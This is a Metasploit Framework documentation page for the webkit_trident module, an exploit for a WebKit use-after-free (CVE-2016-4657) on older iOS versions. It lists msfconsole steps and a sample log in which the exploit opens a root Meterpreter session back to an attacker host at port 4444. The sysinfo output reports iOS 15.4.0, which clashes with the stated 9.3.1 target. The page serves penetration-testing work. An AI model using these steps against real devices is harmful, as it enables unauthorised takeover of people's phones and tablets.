Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/apple_ios/browser/webkit_trident.md
25305 views

Description

This module exploits a UAF vulnerability in WebKit's JavaScriptCore library, CVE-2016-4657.

Vulnerable Application

The exploit should work on 32-bit or 64-bit devices running iOS 9.3.4 or earlier, though it has been tested so far on 64-bit devices running 9.3.1.

Verification Steps

  • Start msfconsole

  • use exploit/apple_ios/browser/webkit_trident

  • set LHOST and SRVHOST as appropriate

  • exploit

  • Browse to the given URL with a vulnerable device from Safari

  • Note that the payload is specially created for this exploit, due to sandbox limitations that prevent spawning new processes.

Scenarios

64bit (ME279NF/A) running iOS 9.3.1:

msf exploit(apple_ios/browser/webkit_trident) >
[*] 192.168.0.101    webkit_trident - Request from Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1
[*] 192.168.0.101    webkit_trident - Request from Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1
[*] 192.168.0.101    webkit_trident - Sent exploit (770048 bytes)
[*] 192.168.0.101    webkit_trident - Request from Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1
[+] 192.168.0.101    webkit_trident - Target is vulnerable.
[*] Meterpreter session 1 opened (192.168.0.110:4444 -> 192.168.0.101:52467) at 2018-05-30 14:49:59 +0200

msf exploit(apple_ios/browser/webkit_trident) > sessions -l

Active sessions
===============

  Id  Name  Type                           Information                                   Connection
  --  ----  ----                           -----------                                   ----------
  1         meterpreter aarch64/apple_ios  uid=0, gid=0, euid=0, egid=0 @ 192.168.0.101  192.168.0.110:4444 -> 192.168.0.101:52467 (192.168.0.101)

msf exploit(apple_ios/browser/webkit_trident) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.0.101
OS           : iPad4,4 (iOS 15.4.0)
Architecture : arm64
BuildTuple   : aarch64-iphone-darwin
Meterpreter  : aarch64/apple_ios